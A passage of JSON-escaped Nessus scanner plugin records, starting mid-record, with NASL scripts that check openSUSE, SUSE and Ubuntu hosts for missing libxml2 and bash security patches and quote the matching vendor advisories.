make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.5.7\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.3.2\",\"11.5.7\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:31:17", "bulletinFamily": "scanner", "description": "This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function xmlSnprintfElementContent in valid.c was vulnerable to a stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was vulnerable to a heap-based buffer over-read (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "modified": "2017-06-09T00:00:00", "id": "OPENSUSE-2017-663.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100708", "published": "2017-06-09T00:00:00", "title": "openSUSE Security Update : libxml2 (openSUSE-2017-663)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-663.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100708);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/06/09 14:41:11 $\");\n\n script_cve_id(\"CVE-2016-1839\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"openSUSE Security Update : libxml2 (openSUSE-2017-663)\");\n script_summary(english:\"Check for the openSUSE-2017-663 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039069\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-devel-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-tools-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-tools-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-devel-32bit-2.9.4-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2-2 / libxml2-2-32bit / libxml2-2-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:31:06", "bulletinFamily": "scanner", "description": "This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function xmlSnprintfElementContent in valid.c was vulnerable to a stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was vulnerable to a heap-based buffer over-read (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow (xmlDictAddString func) (bnc#1039069)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-1454-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100544", "published": "2017-05-31T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2017:1454-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1454-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100544);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/30 10:54:50\");\n\n script_cve_id(\"CVE-2016-1839\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2017:1454-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039069\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1839/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9047/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9048/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9049/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9050/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171454-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97009793\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-891=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-891=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-891=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-891=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-891=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debugsource-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-debugsource-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libxml2-tools-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debuginfo-2.9.4-36.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"python-libxml2-debugsource-2.9.4-36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:56", "bulletinFamily": "scanner", "description": "Bernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. (CVE-2017-5932).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-3294-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100268", "published": "2017-05-18T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : bash vulnerabilities (USN-3294-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3294-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100268);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/12/01 15:12:41\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\", \"CVE-2017-5932\");\n script_xref(name:\"USN\", value:\"3294-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : bash vulnerabilities (USN-3294-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bernd Dietzel discovered that Bash incorrectly expanded the hostname\nwhen displaying the prompt. If a remote attacker were able to modify a\nhostname, this flaw could be exploited to execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu\n16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4\nenvironment variables. A local attacker could use this issue to\nexecute arbitrary code with root privileges. This issue only affected\nUbuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A\nremote attacker could possibly use this issue to bypass restricted\nshells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A\nlocal attacker could possibly use this issue to execute arbitrary\ncode. This issue only affected Ubuntu 17.04. (CVE-2017-5932).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3294-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(14\\.04|16\\.04|16\\.10|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", 